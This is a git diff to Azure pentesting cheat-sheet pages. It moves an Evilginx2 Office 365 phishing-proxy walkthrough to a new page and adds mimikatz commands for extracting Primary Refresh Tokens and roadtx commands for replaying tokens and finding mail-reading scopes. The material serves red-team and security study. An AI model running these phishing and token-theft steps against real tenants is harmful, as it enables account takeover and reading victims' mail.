Evilginx Phishlet

docs/cloud/azure/Cloud - Azure Pentest.md

@@ -16,7 +16,6 @@
     * [Enumerate tenant with az cli](#enumerate-tenant-with-az-cli)
     * [Enumerate manually](#enumerate-manually)
     * [Enumeration methodology](#enumeration-methodology)
-* [Phishing with Evilginx2](#phishing-with-evilginx2)
 * [Token from Managed Identity](#token-from-managed-identity)
     * [Azure API via Powershell](#azure-api-via-powershell)
     * [Azure API via Python Version](#azure-api-via-python-version)
@@ -439,28 +438,6 @@ PS Az> Get-AzStorageAccount | fl
 PS Az> Get-AzKeyVault
 ```
 
-## Phishing with Evilginx2
-
-```powershell
-PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
-: config domain username.corp
-: config ip 10.10.10.10
-: phishlets hostname o365 login.username.corp
-: phishlets get-hosts o365
-
-Create a DNS entry for login.login.username.corp and www.login.username.corp, type A, pointing to your machine
-
-# copy certificate and enable the phishing
-PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
-PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
-: phishlets enable o365
-
-# get the phishing URL
-: lures create o365
-: lures get-url 0
-```
-
-
 
 ## Token from Managed Identity
 

docs/cloud/azure/azure-access-and-token.md

@@ -91,13 +91,15 @@ Mail.ReadWrite.All  https://graph.microsoft.com             00b41c95-dab0-4487-9
 
 * Use PRT token
     ```ps1
-    roadtx browserprtauth -prt roadtx.prt -url http://www.office.com
+    roadtx browserprtauth --prt <prt-token> --prt-sessionkey <session-key>
+    roadtx browserprtauth --prt roadtx.prt -url http://www.office.com
     ```
 
 
 ### Extract PRT v1
 
 ```ps1
+mimikatz # token::elevate
 mimikatz # sekurlsa::cloudap
 mimikatz # sekurlsa::dpapi
 mimikatz # dpapi::cloudapkd /keyvalue:<key-value> /unprotect
@@ -110,7 +112,7 @@ roadtx browserprtauth --prt <prt> --prt-sessionkey <clear-key> --keep-open -url
 * No method known to date.
 
 
-### Generate a PRT by registering a device
+### Upgrade Refresh Token to PRT
 
 ```ps1
 # Get correct token audience

docs/cloud/azure/azure-devices-users-services.md

@@ -46,3 +46,14 @@ roadtx browserprtauth --prt <prt-token> --prt-sessionkey <prt-session-key> --kee
 
 
 # Service Principals
+
+
+
+# Other
+
+Lists all the client IDs you can use to get a token with the `mail.read` scope on the Microsoft Graph:
+
+```ps1
+roadtx getscope -s https://graph.microsoft.com/mail.read
+roadtx findscope -s https://graph.microsoft.com/mail.read
+```

docs/cloud/azure/azure-phishing.md

@@ -98,3 +98,26 @@ roadtx codeauth -c <app-id> -r msgraph -t <tenant-id> <0.A....> -ru 'https://<ph
 * Leave TokenTactics running in the PowerShell window and send the phishing email
 * Targeted user will follow the link to https://microsoft.com/devicelogin and complete the Device Code form
 * Enjoy your **access token** and **refresh token**
+
+
+## Phishing with Evilginx2
+
+* Run `evilginx2` with o365 phishlet
+    ```powershell
+    PS C:\Tools> evilginx2 -p C:\Tools\evilginx2\phishlets
+    : config domain username.corp
+    : config ip 10.10.10.10
+    : phishlets hostname o365 login.username.corp
+    : phishlets get-hosts o365
+    ```
+* Create a DNS entry type A for `login.login.username.corp` and `www.login.username.corp`, pointing to your machine
+* Copy certificate and enable the phishing
+    ```ps1
+    PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\ca.crt C:\Users\Username\.evilginx\crt\login.username.corp\o365.crt
+    PS C:\Tools> Copy-Item C:\Users\Username\.evilginx\crt\private.key C:\Users\Username\.evilginx\crt\login.username.corp\o365.key
+    : phishlets enable o365
+
+    # get the phishing URL
+    : lures create o365
+    : lures get-url 0
+    ```

docs/cloud/azure/azure-services.md

@@ -50,7 +50,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
 ```
 
 
-## Outlook Mails
+### Outlook Mails
 
 * Read user mails
     ```ps1
@@ -58,7 +58,7 @@ AADInternals> Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token |
     Get-MgUserMessageContent -OutFile mail.txt -UserId <user-id> -MessageId <message-id>
     ```
 
-## OneDrive Files
+### OneDrive Files
 
 ```ps1
 $userId = "<user-id>"